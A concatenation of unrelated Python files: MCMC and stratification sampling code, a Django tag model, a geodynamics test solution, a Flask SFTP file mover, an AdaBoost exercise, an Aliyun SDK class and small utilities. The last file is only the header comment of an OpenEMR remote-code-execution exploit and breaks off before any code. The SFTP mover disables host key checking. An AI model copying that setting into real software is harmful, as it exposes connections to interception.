self.pdf_params = list(itertools.repeat(self.pdf_params, self.dimension))
self.pdf_type = list(itertools.repeat(self.pdf_type, self.dimension))
self.pdf_type = list(chain.from_iterable(self.pdf_type))
self.pdf_params = list(chain.from_iterable(self.pdf_params))
elif len(self.pdf_type) != len(self.pdf_params):
raise NotImplementedError("Exit code: Incompatible dimensions.")
# TODO: Create a list that contains all element info - parent structure
# e.g. SS_samples = [STS[j] for j in range(0,nsamples)]
# hstack
########################################################################################################################
########################################################################################################################
# Class Strata
########################################################################################################################
class Strata:
"""
Define a rectilinear stratification of the n-dimensional unit hypercube with N strata.
:param nstrata: array-like
An array of dimension 1 x n defining the number of strata in each of the n dimensions
Creates an equal stratification with strata widths equal to 1/nstrata
The total number of strata, N, is the product of the terms of nstrata
Example -
nstrata = [2, 3, 2] creates a 3d stratification with:
2 strata in dimension 0 with stratum widths 1/2
3 strata in dimension 1 with stratum widths 1/3
2 strata in dimension 2 with stratum widths 1/2
:param input_file: string
File path to input file specifying stratum origins and stratum widths
:param origins: array-like
An array of dimension N x n specifying the origins of all strata
The origins of the strata are the coordinates of the stratum orthotope nearest the global origin
Example - A 2D stratification with 2 strata in each dimension
origins = [[0, 0]
[0, 0.5]
[0.5, 0]
[0.5, 0.5]]
:param widths: array-like
An array of dimension N x n specifying the widths of all strata in each dimension
Example - A 2D stratification with 2 strata in each dimension
widths = [[0.5, 0.5]
[0.5, 0.5]
[0.5, 0.5]
[0.5, 0.5]]
"""
def __init__(self, nstrata=None, input_file=None, origins=None, widths=None):
"""
Class defines a rectilinear stratification of the n-dimensional unit hypercube with N strata
:param nstrata: array-like
An array of dimension 1 x n defining the number of strata in each of the n dimensions
Creates an equal stratification with strata widths equal to 1/nstrata
The total number of strata, N, is the product of the terms of nstrata
Example -
nstrata = [2, 3, 2] creates a 3d stratification with:
2 strata in dimension 0 with stratum widths 1/2
3 strata in dimension 1 with stratum widths 1/3
2 strata in dimension 2 with stratum widths 1/2
:param input_file: string
File path to input file specifying stratum origins and stratum widths
See documentation ######## for input file format
:param origins: array-like
An array of dimension N x n specifying the origins of all strata
The origins of the strata are the coordinates of the stratum orthotope nearest the global origin
Example - A 2D stratification with 2 strata in each dimension
origins = [[0, 0]
[0, 0.5]
[0.5, 0]
[0.5, 0.5]]
:param widths: array-like
An array of dimension N x n specifying the widths of all strata in each dimension
Example - A 2D stratification with 2 strata in each dimension
widths = [[0.5, 0.5]
[0.5, 0.5]
[0.5, 0.5]
[0.5, 0.5]]
Created by: Michael D. Shields
Last modified: 11/4/2017
Last modified by: Michael D. Shields
"""
self.input_file = input_file
self.nstrata = nstrata
self.origins = origins
self.widths = widths
if self.nstrata is None:
if self.input_file is None:
if self.widths is None or self.origins is None:
sys.exit('Error: The strata are not fully defined. Must provide [nstrata], '
'input file, or [origins] and [widths]')
else:
# Read the strata from the specified input file
# See documentation for input file formatting
array_tmp = np.loadtxt(input_file)
self.origins = array_tmp[:, 0:array_tmp.shape[1] // 2]
self.width = array_tmp[:, array_tmp.shape[1] // 2:]
# Check to see that the strata are space-filling
space_fill = np.sum(np.prod(self.width, 1))
if 1 - space_fill > 1e-5:
sys.exit('Error: The stratum design is not space-filling.')
if 1 - space_fill < -1e-5:
sys.exit('Error: The stratum design is over-filling.')
# TODO: MDS - Add a check for disjointness of strata
# Check to see that the strata are disjoint
# ncorners = 2**self.strata.shape[1]
# for i in range(0,len(self.strata)):
# for j in range(0,ncorners):
else:
# Use nstrata to assign the origin and widths of a specified rectilinear stratification.
self.origins = np.divide(self.fullfact(self.nstrata), self.nstrata)
self.widths = np.divide(np.ones(self.origins.shape), self.nstrata)
self.weights = np.prod(self.widths, axis=1)
def fullfact(self, levels):
# TODO: MDS - Acknowledge the source here.
"""
Create a general full-factorial design
Parameters
----------
levels : array-like
An array of integers that indicate the number of levels of each input
design factor.
Returns
-------
mat : 2d-array
The design matrix with coded levels 0 to k-1 for a k-level factor
Example
-------
::
>>> fullfact([2, 4, 3])
array([[ 0., 0., 0.],
[ 1., 0., 0.],
[ 0., 1., 0.],
[ 1., 1., 0.],
[ 0., 2., 0.],
[ 1., 2., 0.],
[ 0., 3., 0.],
[ 1., 3., 0.],
[ 0., 0., 1.],
[ 1., 0., 1.],
[ 0., 1., 1.],
[ 1., 1., 1.],
[ 0., 2., 1.],
[ 1., 2., 1.],
[ 0., 3., 1.],
[ 1., 3., 1.],
[ 0., 0., 2.],
[ 1., 0., 2.],
[ 0., 1., 2.],
[ 1., 1., 2.],
[ 0., 2., 2.],
[ 1., 2., 2.],
[ 0., 3., 2.],
[ 1., 3., 2.]])
"""
n = len(levels) # number of factors
nb_lines = np.prod(levels) # number of trial conditions
H = np.zeros((nb_lines, n))
level_repeat = 1
range_repeat = np.prod(levels)
for i in range(n):
range_repeat //= levels[i]
lvl = []
for j in range(levels[i]):
lvl += [j] * level_repeat
rng = lvl * range_repeat
level_repeat *= levels[i]
H[:, i] = rng
return H
########################################################################################################################
########################################################################################################################
# Markov Chain Monte Carlo (MCMC)
########################################################################################################################
class MCMC:
"""Generate samples from an arbitrary probability density function using Markov Chain Monte Carlo.
This class generates samples from an arbitrary user-specified distribution using Metropolis-Hastings(MH),
Modified Metropolis-Hastings, of Affine Invariant Ensemble Sampler with stretch moves.
References:
S.-K. Au and J. L. Beck, “Estimation of small failure probabilities in high dimensions by subset simulation,”
Probabilistic Eng. Mech., vol. 16, no. 4, pp. 263–277, Oct. 2001.
J. Goodman and J. Weare, “Ensemble samplers with affine invariance,” Commun. Appl. Math. Comput. Sci., vol. 5,
no. 1, pp. 65–80, 2010.
Input:
:param dimension: A scalar value defining the dimension of target density function.
Default: 1
:type dimension: int
:param pdf_proposal_type: Type of proposal density function for MCMC. Only used with algorithm = 'MH' or 'MMH'
Options:
'Normal' : Normal proposal density
'Uniform' : Uniform proposal density
Default: 'Uniform'
If dimension > 1 and algorithm = 'MMH', this may be input as a list to assign different proposal
densities to each dimension. Example pdf_proposal_type = ['Normal','Uniform'].
If dimension > 1, algorithm = 'MMH' and this is input as a string, the proposal densities for all
dimensions are set equal to the assigned proposal type.
:type pdf_proposal_type: str or str list
:param pdf_proposal_scale: Scale of the proposal distribution
If algorithm == 'MH' or 'MMH'
For pdf_proposal_type = 'Uniform'
Proposal is Uniform in [x-pdf_proposal_scale/2, x+pdf_proposal_scale/2]
For pdf_proposal_type = 'Normal'
Proposal is Normal with standard deviation equal to pdf_proposal_scale
If algorithm == 'Stretch'
pdf_proposal_scale sets the scale of the stretch density
g(z) = 1/sqrt(z) for z in [1/pdf_proposal_scale, pdf_proposal_scale]
Default value: dimension x 1 list of ones
:type pdf_proposal_scale: float or float list
If dimension > 1, this may be defined as float or float list
If input as float, pdf_proposal_scale is assigned to all dimensions
If input as float list, each element is assigned to the corresponding dimension
:param pdf_target_type: Type of target density function for acceptance/rejection in MMH. Not used for MH or Stretch.
Options:
'marginal_pdf': Check acceptance/rejection for a candidate in MMH using the marginal pdf
For independent variables only
'joint_pdf': Check acceptance/rejection for a candidate in MMH using the joint pdf
Default: 'marginal_pdf'
:type pdf_target_type: str
:param pdf_target: Target density function from which to draw random samples
The target joint probability density must be a function, or list of functions, or a string.
If type == 'str'
The assigned string must refer to a custom pdf defined in the file custom_pdf.py in the working
directory
If type == function
The function must be defined in the python script calling MCMC
If dimension > 1 and pdf_target_type='marginal_pdf', the input to pdf_target is a list of size
[dimensions x 1] where each item of the list defines a marginal pdf.
Default: Multivariate normal distribution having zero mean and unit standard deviation
:type pdf_target: function, function list, or str
:param pdf_target_params: Parameters of the target pdf
:type pdf_target_params: list
:param algorithm: Algorithm used to generate random samples.
Options:
'MH': Metropolis Hastings Algorithm
'MMH': Component-wise Modified Metropolis Hastings Algorithm
'Stretch': Affine Invariant Ensemble MCMC with stretch moves
Default: 'MMH'
:type algorithm: str
:param jump: Number of samples between accepted states of the Markov chain.
Default value: 1 (Accepts every state)
:type: jump: int
:param nsamples: Number of samples to generate
No Default Value: nsamples must be prescribed
:type nsamples: int
:param seed: Seed of the Markov chain(s)
For 'MH' and 'MMH', this is a single point, defined as a numpy array of dimension (1 x dimension)
For 'Stretch', this is a numpy array of dimension N x dimension, where N is the ensemble size
Default:
For 'MH' and 'MMH': zeros(1 x dimension)
For 'Stretch': No default, this must be specified.
:type seed: float or numpy array
:param nburn: Length of burn-in. Number of samples at the beginning of the chain to discard.
This option is only used for the 'MMH' and 'MH' algorithms.
Default: nburn = 0
:type nburn: int
Output:
:return: MCMC.samples:
:rtype: MCMC.samples: numpy array
"""
# Authors: Mohit Chauhan, Dimitris Giovanis, Michael D. Shields
# Updated: 4/26/18 by Michael D. Shields
def __init__(self, dimension=None, pdf_proposal_type=None, pdf_proposal_scale=None, pdf_target_type=None,
pdf_target=None, pdf_target_params=None, algorithm=None, jump=None, nsamples=None, seed=None,
nburn=None):
self.pdf_proposal_type = pdf_proposal_type
self.pdf_proposal_scale = pdf_proposal_scale
self.pdf_target_type = pdf_target_type
self.pdf_target = pdf_target
self.pdf_target_params = pdf_target_params
self.algorithm = algorithm
self.jump = jump
self.nsamples = nsamples
self.dimension = dimension
self.seed = seed
self.nburn = nburn
self.init_mcmc()
if self.algorithm is 'Stretch':
self.ensemble_size = len(self.seed)
self.samples = self.run_mcmc()
def run_mcmc(self):
rejects = 0
# Defining an array to store the generated samples
samples = np.zeros([self.nsamples * self.jump, self.dimension])
################################################################################################################
# Classical Metropolis-Hastings Algorithm with symmetric proposal density
if self.algorithm == 'MH':
from numpy.random import normal, multivariate_normal, uniform
samples[0, :] = self.seed
pdf_ = self.pdf_target[0]
for i in range(self.nsamples * self.jump - 1 + self.nburn):
if self.pdf_proposal_type[0] == 'Normal':
if self.dimension == 1:
candidate = normal(samples[i, :], np.array(self.pdf_proposal_scale))
else:
if i == 0:
self.pdf_proposal_scale = np.diag(np.array(self.pdf_proposal_scale))
candidate = multivariate_normal(samples[i, :], np.array(self.pdf_proposal_scale))
elif self.pdf_proposal_type == 'Uniform':
candidate = uniform(low=samples[i, :] - np.array(self.pdf_proposal_scale) / 2,
high=samples[i, :] + np.array(self.pdf_proposal_scale) / 2,
size=self.dimension)
p_proposal = pdf_(candidate, self.pdf_target_params)
p_current = pdf_(samples[i, :], self.pdf_target_params)
p_accept = p_proposal / p_current
accept = np.random.random() < p_accept
if accept:
samples[i + 1, :] = candidate
else:
samples[i + 1, :] = samples[i, :]
rejects += 1
################################################################################################################
# Modified Metropolis-Hastings Algorithm with symmetric proposal density
elif self.algorithm == 'MMH':
samples[0, :] = self.seed[0:]
if self.pdf_target_type == 'marginal_pdf':
for i in range(self.nsamples * self.jump - 1 + self.nburn):
for j in range(self.dimension):
pdf_ = self.pdf_target[j]
if self.pdf_proposal_type[j] == 'Normal':
candidate = np.random.normal(samples[i, j], self.pdf_proposal_scale[j])
elif self.pdf_proposal_type[j] == 'Uniform':
candidate = np.random.uniform(low=samples[i, j] - self.pdf_proposal_scale[j] / 2,
high=samples[i, j] + self.pdf_proposal_scale[j] / 2, size=1)
p_proposal = pdf_(candidate, self.pdf_target_params)
p_current = pdf_(samples[i, j], self.pdf_target_params)
p_accept = p_proposal / p_current
accept = np.random.random() < p_accept
if accept:
samples[i + 1, j] = candidate
else:
samples[i + 1, j] = samples[i, j]
elif self.pdf_target_type == 'joint_pdf':
pdf_ = self.pdf_target[0]
for i in range(self.nsamples * self.jump - 1 + self.nburn):
candidate = list(samples[i, :])
current = list(samples[i, :])
for j in range(self.dimension):
if self.pdf_proposal_type[j] == 'Normal':
candidate[j] = np.random.normal(samples[i, j], self.pdf_proposal_scale[j])
elif self.pdf_proposal_type[j] == 'Uniform':
candidate[j] = np.random.uniform(low=samples[i, j] - self.pdf_proposal_scale[j] / 2,
high=samples[i, j] + self.pdf_proposal_scale[j] / 2,
size=1)
p_proposal = pdf_(candidate, self.pdf_target_params)
p_current = pdf_(current, self.pdf_target_params)
p_accept = p_proposal / p_current
accept = np.random.random() < p_accept
if accept:
current[j] = candidate[j]
else:
candidate[j] = current[j]
samples[i + 1, :] = current
################################################################################################################
# Affine Invariant Ensemble Sampler with stretch moves
# Reference: Goodman, J. and Weare, J., (2010) "Ensemble samplers with affine invariance." Communications in
# applied mathematics and computational science. 5: 65-80.
elif self.algorithm == 'Stretch':
samples[0:self.ensemble_size, :] = self.seed
pdf_ = self.pdf_target[0]
for i in range(self.ensemble_size-1,self.nsamples * self.jump - 1):
complementary_ensemble = samples[i-self.ensemble_size+2:i+1,:]
S = random.choice(complementary_ensemble)
s = (1+(self.pdf_proposal_scale[0]-1)*random.random())**2/self.pdf_proposal_scale[0]
candidate = S+s*(samples[i-self.ensemble_size+1,:]-S)
p_proposal = pdf_(candidate, self.pdf_target_params)
p_current = pdf_(samples[i-self.ensemble_size+1, :], self.pdf_target_params)
p_accept = s**(self.dimension-1)*p_proposal/p_current
accept = np.random.random() < p_accept
if accept:
samples[i + 1, :] = candidate
else:
samples[i + 1, :] = samples[i-self.ensemble_size+1, :]
################################################################################################################
# Return the samples
if self.algorithm is 'MMH' or self.algorithm is 'MH':
return samples[self.nburn:self.nsamples * self.jump +self.nburn:self.jump]
else:
output = np.zeros((self.nsamples,self.dimension))
j = 0
for i in range(self.jump*self.ensemble_size-self.ensemble_size, samples.shape[0],
self.jump*self.ensemble_size):
output[j:j+self.ensemble_size,:] = samples[i:i+self.ensemble_size,:]
j = j+self.ensemble_size
return output
# TODO: Add Gibbs Sampler
# TODO: Add Affine Invariant with walk moves
####################################################################################################################
# Check to ensure consistency of the user input and assign defaults
def init_mcmc(self):
if self.dimension is None:
self.dimension = 1
# Check nsamples
if self.nsamples is None:
raise NotImplementedError('Exit code: Number of samples not defined.')
# Check seed
if self.seed is None:
self.seed = np.zeros(self.dimension)
if self.algorithm is not 'Stretch':
if self.seed.__len__() != self.dimension:
raise NotImplementedError("Exit code: Incompatible dimensions in 'seed'.")
else:
if self.seed.shape[0] < 3:
raise NotImplementedError("Exit code: Ensemble size must be > 2.")
# Check jump
if self.jump is None:
self.jump = 1
# Check pdf_proposal_type
if self.pdf_proposal_type is None:
self.pdf_proposal_type = 'Uniform'
# If pdf_proposal_type is entered as a string, make it a list
if type(self.pdf_proposal_type).__name__=='str':
self.pdf_proposal_type = [self.pdf_proposal_type]
for i in self.pdf_proposal_type:
if i not in ['Uniform', 'Normal']:
raise ValueError('Exit code: Unrecognized type for proposal distribution. Supported distributions: '
'Uniform, '
'Normal.')
if self.algorithm is 'MH' and len(self.pdf_proposal_type)!=1:
raise ValueError('Exit code: MH algorithm can only take one proposal distribution.')
elif len(self.pdf_proposal_type)!=self.dimension:
if len(self.pdf_proposal_type) == 1:
self.pdf_proposal_type = self.pdf_proposal_type * self.dimension
else:
raise NotImplementedError("Exit code: Incompatible dimensions in 'pdf_proposal_type'.")
# Check pdf_proposal_scale
if self.pdf_proposal_scale is None:
if self.algorithm == 'Stretch':
self.pdf_proposal_scale = 2
else:
self.pdf_proposal_scale = 1
if type(self.pdf_proposal_scale).__name__ != 'list':
self.pdf_proposal_scale = [self.pdf_proposal_scale]
if len(self.pdf_proposal_scale) != self.dimension:
if len(self.pdf_proposal_scale) == 1:
self.pdf_proposal_scale = self.pdf_proposal_scale * self.dimension
else:
raise NotImplementedError("Exit code: Incompatible dimensions in 'pdf_proposal_scale'.")
# Check pdf_target_type
if self.algorithm is 'MMH' and self.pdf_target_type is None:
self.pdf_target_type = 'marginal_pdf'
if self.algorithm is 'Stretch':
self.pdf_target_type = 'joint_pdf'
if self.pdf_target_type not in ['joint_pdf', 'marginal_pdf']:
raise ValueError('Exit code: Unrecognized type for target distribution. Supported distributions: '
'joint_pdf, '
'marginal_pdf.')
# Check algorithm
if self.algorithm is None:
self.algorithm = 'MMH'
else:
if self.algorithm not in ['MH', 'MMH', 'Stretch']:
raise NotImplementedError('Exit code: Unrecognized MCMC algorithm. Supported algorithms: '
'Metropolis-Hastings (MH), '
'Modified Metropolis-Hastings (MMH), '
'Affine Invariant Ensemble with Stretch Moves (Stretch).')
# Check pdf_target
if type(self.pdf_target).__name__ == 'str':
self.pdf_target = pdf(self.pdf_target)
if self.pdf_target is None and self.algorithm is 'MMH':
if self.dimension == 1 or self.pdf_target_type is 'marginal_pdf':
def target(x, dummy):
return sp.norm.pdf(x)
if self.dimension == 1:
self.pdf_target = [target]
else:
self.pdf_target = [target] * self.dimension
else:
def target(x, dummy):
return sp.multivariate_normal.pdf(x,mean=np.zeros(self.dimension),cov=np.eye(self.dimension))
self.pdf_target = [target]
elif self.pdf_target is None:
if self.dimension == 1:
def target(x, dummy):
return sp.norm.pdf(x)
self.pdf_target = [target]
else:
def target(x, dummy):
return sp.multivariate_normal.pdf(x,mean=np.zeros(self.dimension),cov=np.eye(self.dimension))
self.pdf_target = [target]
elif type(self.pdf_target).__name__ != 'list':
self.pdf_target = [self.pdf_target]
# Check pdf_target_params
if self.pdf_target_params is None:
self.pdf_target_params = []
if type(self.pdf_target_params).__name__!='list':
self.pdf_target_params = [self.pdf_target_params]
if self.nburn is None:
self.nburn = 0
########################################################################################################################
########################################################################################################################
# ADD ANY NEW METHOD HERE
######################################################################################################################## |
py | 1a34580253aa0fb091defa7e1d8572b5dfb3e6cc | from django.db import models
from django.contrib.auth.models import User as AuthUser
from _commons.fields import ColorField
from .helpers import *
from .settings import *
# List: lists available tags
class List(models.Model):
"""
Database [tag.list]
"""
name = models.CharField(db_index=True, max_length=TAG_NAME_MAX_LENGTH)
description = models.CharField(max_length=TAG_DESC_MAX_LENGTH, default='')
slug = models.CharField(db_index=True, max_length=TAG_SLUG_MAX_LENGTH)
color = ColorField(blank=True)
author = models.ForeignKey(AuthUser)
date = models.DateTimeField(auto_now_add=True)
picture_original = models.FileField(upload_to=TagHelper.get_picture_path_original)
picture_small = models.FileField(upload_to=TagHelper.get_picture_path_small)
picture_normal = models.FileField(upload_to=TagHelper.get_picture_path_normal)
picture_large = models.FileField(upload_to=TagHelper.get_picture_path_large)
def __unicode__(self):
return u'%s' % (self.name)
def url_picture_original(self):
return TagHelper.get_picture_absolute_url(
self.picture_original or DEFAULT_PICTURE_PATH['original']
)
def url_picture_small(self):
return TagHelper.get_picture_absolute_url(
self.picture_small or DEFAULT_PICTURE_PATH['small']
)
def url_picture_normal(self):
return TagHelper.get_picture_absolute_url(
self.picture_normal or DEFAULT_PICTURE_PATH['normal']
)
def url_picture_large(self):
return TagHelper.get_picture_absolute_url(
self.picture_large or DEFAULT_PICTURE_PATH['large']
)
|
py | 1a3459dd64ad9f2bf92987e0305a34fab6b2e3cc | #!/usr/bin/env python
#
# ----------------------------------------------------------------------
#
# Brad T. Aagaard, U.S. Geological Survey
# Charles A. Williams, GNS Science
# Matthew G. Knepley, University of Chicago
#
# This code was developed as part of the Computational Infrastructure
# for Geodynamics (http://geodynamics.org).
#
# Copyright (c) 2010-2017 University of California, Davis
#
# See COPYING for license information.
#
# ----------------------------------------------------------------------
#
## @file tests/2d/quad4/slipweakening_compression_soln.py
##
## @brief Analytical solution to compression problem with slipweakening.
import numpy
# Physical properties
p_density = 2500.0
p_vs = 3000.0
p_vp = 5291.502622129181
p_mu = p_density*p_vs**2
p_lambda = p_density*p_vp**2 - 2*p_mu
# Uniform stress field (plane strain)
sxx = 0.0
sxy = 1.0e+6
syy = 0.0
szz = p_lambda/(2*p_lambda+2*p_mu)*(sxx+syy)
# Uniform strain field
exx = 1.0/(2*p_mu) * (sxx - p_lambda/(3*p_lambda+2*p_mu) * (sxx+syy+szz))
eyy = 1.0/(2*p_mu) * (syy - p_lambda/(3*p_lambda+2*p_mu) * (sxx+syy+szz))
ezz = 1.0/(2*p_mu) * (szz - p_lambda/(3*p_lambda+2*p_mu) * (sxx+syy+szz))
exy = 1.0/(2*p_mu) * (sxy)
#print exx,eyy,exy,ezz,szz
#print -exx*p_lambda/(p_lambda+2*p_mu)
# ----------------------------------------------------------------------
class AnalyticalSoln(object):
"""
Analytical solution to slipweakening_compression problem.
"""
def __init__(self):
return
def displacement(self, locs, nlocsO):
"""
Compute displacement field at locations.
"""
(nlocs, dim) = locs.shape
disp = numpy.zeros( (1, nlocs, 2), dtype=numpy.float64)
disp[0,:,1] = 2*exy*(locs[:,0]+max(abs(locs[:,0])))
return disp
def strain(self, locs):
"""
Compute strain field at locations.
"""
(npts, dim) = locs.shape
strain = numpy.zeros( (1, npts, 3), dtype=numpy.float64)
strain[0,:,0] = exx
strain[0,:,1] = eyy
strain[0,:,2] = exy
return strain
def stress(self, locs):
"""
Compute stress field at locations.
"""
(npts, dim) = locs.shape
stress = numpy.zeros( (1, npts, 3), dtype=numpy.float64)
stress[0,:,0] = sxx
stress[0,:,1] = syy
stress[0,:,2] = sxy
return stress
# End of file
|
py | 1a3459ee78d5b57a83665367b43a2ebae445c84e | from typing import Dict
import pysftp
from flask import Blueprint, current_app
from paramiko import SSHException
from models import Instrument
from pkg.case_mover import CaseMover
from pkg.google_storage import GoogleStorage
from pkg.sftp import SFTP
from util.service_logging import log
mover = Blueprint("batch", __name__, url_prefix="/")
@mover.route("/")
def main():
config = current_app.nisra_config
sftp_config = current_app.sftp_config
google_storage = init_google_storage(config)
if google_storage.bucket is None:
return "Connection to bucket failed", 500
log.info("Connecting to SFTP server")
cnopts = pysftp.CnOpts()
cnopts.hostkeys = None
with pysftp.Connection(
host=sftp_config.host,
username=sftp_config.username,
password=sftp_config.password,
port=int(sftp_config.port),
cnopts=cnopts,
) as sftp_connection:
log.info("Connected to SFTP server")
sftp = SFTP(sftp_connection, sftp_config, config)
case_mover = CaseMover(google_storage, config, sftp)
instruments = get_filtered_instruments(sftp)
log.info(f"Processing survey - {sftp_config.survey_source_path}")
if len(instruments) == 0:
log.info("No instrument folders found")
return "No instrument folders found, exiting", 200
for instrument_name, instrument in instruments.items():
process_instrument(case_mover, instrument_name, instrument)
log.info("SFTP connection closed")
log.info("Process complete")
return "Process complete", 200
@mover.errorhandler(SSHException)
def handle_ssh_exception(exception):
log.error("SFTP connection failed - %s", exception)
return "SFTP connection failed", 500
@mover.errorhandler(Exception)
def handle_exception(exception):
log.error("Exception - %s", exception)
log.info("SFTP connection closed")
return "Exception occurred", 500
def process_instrument(
case_mover: CaseMover, instrument_name: str, instrument: Instrument
) -> None:
log.info(f"Processing instrument - {instrument_name} - {instrument.sftp_path}")
if case_mover.bdbx_md5_changed(instrument):
log.info(
f"Instrument - {instrument_name} - "
+ "has no changes to the databse file, skipping..."
)
else:
log.info(f"Syncing instrument - {instrument_name}")
case_mover.sync_instrument(instrument)
case_mover.send_request_to_api(instrument.gcp_folder())
def get_filtered_instruments(sftp: SFTP) -> Dict[str, Instrument]:
instrumets = sftp.get_instrument_folders()
instruments = sftp.get_instrument_files(instrumets)
instruments = sftp.filter_instrument_files(instruments)
instruments = sftp.generate_bdbx_md5s(instruments)
return instruments
def init_google_storage(config):
google_storage = GoogleStorage(config.bucket_name, log)
google_storage.initialise_bucket_connection()
return google_storage
|
py | 1a345a5cb7ff659d3df8cb0d5c63dfed58da6298 | import numpy as np
from typing import Tuple
from IMLearn.metalearners.adaboost import AdaBoost
from IMLearn.learners.classifiers import DecisionStump
from utils import *
import plotly.graph_objects as go
from plotly.subplots import make_subplots
def generate_data(n: int, noise_ratio: float) -> Tuple[np.ndarray, np.ndarray]:
"""
Generate a dataset in R^2 of specified size
Parameters
----------
n: int
Number of samples to generate
noise_ratio: float
Ratio of labels to invert
Returns
-------
X: np.ndarray of shape (n_samples,2)
Design matrix of samples
y: np.ndarray of shape (n_samples,)
Labels of samples
"""
'''
generate samples X with shape: (num_samples, 2) and labels y with shape (num_samples).
num_samples: the number of samples to generate
noise_ratio: invert the label for this ratio of the samples
'''
X, y = np.random.rand(n, 2) * 2 - 1, np.ones(n)
y[np.sum(X ** 2, axis=1) < 0.5 ** 2] = -1
y[np.random.choice(n, int(noise_ratio * n))] *= -1
return X, y
def fit_and_evaluate_adaboost(noise, n_learners=250, train_size=5000, test_size=500):
(train_X, train_y), (test_X, test_y) = generate_data(train_size, noise), generate_data(test_size, noise)
# Question 1: Train- and test errors of AdaBoost in noiseless case
ada = AdaBoost(wl=DecisionStump, iterations=n_learners)
ada.fit(train_X, train_y)
train_losses = [ada.partial_loss(train_X, train_y, i) for i in range(1, n_learners)]
test_losses = [ada.partial_loss(test_X, test_y, i) for i in range(1, n_learners)]
x_arr = np.arange(1, n_learners + 1)
fig1 = go.Figure([go.Scatter(x=x_arr, y=train_losses, name="train"),
go.Scatter(x=x_arr, y=test_losses, name="test")],
layout=dict(title="The training- and test errors as a function of the number of fitted "
"learners"))
fig1.show()
# Question 2: Plotting decision surfaces
symbols = np.array(["circle", "x"])
T = [5, 50, 100, 250]
lims = np.array([np.r_[train_X, test_X].min(axis=0), np.r_[train_X, test_X].max(axis=0)]).T + np.array([-.1, .1])
fig2 = make_subplots(rows=2, cols=2, subplot_titles=[rf"$\textbf{{{m}}} models$" for m in T],
horizontal_spacing=0.01, vertical_spacing=.03)
for i, m in enumerate(T):
fig2.add_traces([decision_surface(lambda x: ada.partial_predict(x, m), lims[0], lims[1],
showscale=False),
go.Scatter(x=test_X[:, 0], y=test_X[:, 1], mode="markers", showlegend=False,
marker=dict(color=test_y,
colorscale=[custom[0], custom[-1]],
line=dict(color="black", width=1)))],
rows=(i // 2) + 1, cols=(i % 2) + 1)
fig2.update_layout(title=rf"$\textbf{{ decision boundary - up to iteration 5, 50, 100 and 250}}$",
margin=dict(t=100)).update_xaxes(visible=False).update_yaxes(visible=False)
fig2.show()
# Question 3: Decision surface of best performing ensemble
min_ = np.argmin(test_losses)
fig3 = go.Figure([decision_surface(lambda x: ada.partial_predict(x, int(min_)), lims[0],
lims[1],
showscale=False),
go.Scatter(x=test_X[:, 0], y=test_X[:, 1], mode="markers", showlegend=False,
marker=dict(color=test_y,
colorscale=[custom[0], custom[-1]],
line=dict(color="black", width=1)))],
layout=dict(title=f"The decision surface of the ensemble that achieved the lowest "
f"test error. "
f"ensemble size: {min_ + 1}, accuracy:"
f" {1 - test_losses[min_]}"))
fig3.show()
# Question 4: Decision surface with weighted samples
normalized_D = ada.D_ / np.max(ada.D_) * 5
fig4 = go.Figure([decision_surface(ada.predict, lims[0],
lims[1],
showscale=False),
go.Scatter(x=train_X[:, 0], y=train_X[:, 1], mode="markers", showlegend=False,
marker=dict(color=train_y, size=normalized_D,
colorscale=[custom[0], custom[-1]],
line=dict(color="black", width=1)))],
layout=dict(title="The training set with a point size proportional to it’s weight"))
fig4.show()
if __name__ == '__main__':
np.random.seed(0)
fit_and_evaluate_adaboost(0)
fit_and_evaluate_adaboost(0.4)
|
py | 1a345a64bd7bb5f9d61fa47f39c528e0063eeaf6 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkccc.endpoint import endpoint_data
class GetSmsConfigRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'CCC', '2017-07-05', 'GetSmsConfig')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_Scenarios(self):
return self.get_query_params().get('Scenarios')
def set_Scenarios(self,Scenarios):
for i in range(len(Scenarios)):
if Scenarios[i] is not None:
self.add_query_param('Scenario.' + str(i + 1) , Scenarios[i]); |
py | 1a345b5abe678f19efe5b738af1716f8792654e9 | # Author: Tan Duc Mai
# Email: [email protected]
# Description: Three different functions to check whether a given number is a prime.
# Return True if it is a prime, False otherwise.
# Those three functions, from a to c, decreases in efficiency
# (takes longer time).
from math import sqrt
def is_prime_a(n):
if n < 2:
return False
sqrt_n = int(sqrt(n))
for i in range(2, sqrt_n + 1):
if n % i == 0:
return False
return True
def is_prime_b(n):
if n > 1:
if n == 2:
return True
else:
for i in range(2, n):
if n % i == 0:
return False
return True
return False
def is_prime_c(n):
divisible = 0
for i in range(1, n + 1):
if n % i == 0:
divisible += 1
if divisible == 2:
return True
return False
|
py | 1a345ba8b0c6324d3cd78f2b175a86910aa6f613 | from arm.logicnode.arm_nodes import *
class ResumeActionNode(ArmLogicTreeNode):
"""Resume an action."""
bl_idname = 'LNResumeActionNode'
bl_label = 'Resume Action'
arm_version = 1
def init(self, context):
super(ResumeActionNode, self).init(context)
self.add_input('ArmNodeSocketAction', 'In')
self.add_input('ArmNodeSocketObject', 'Object')
self.add_output('ArmNodeSocketAction', 'Out')
add_node(ResumeActionNode, category=PKG_AS_CATEGORY)
|
py | 1a345bb119f9b825119b04f2369da73697ae1fe6 | # Title: OpenEMR < 5.0.1 - Remote Code Execution
# Author: Cody Zacharias
# Date: 2018-08-07
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
# Version: < 5.0.1 (Patch 4)
# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
# References:
# https://www.youtube.com/watch?v=DJSQ8Pk_7hc
'''
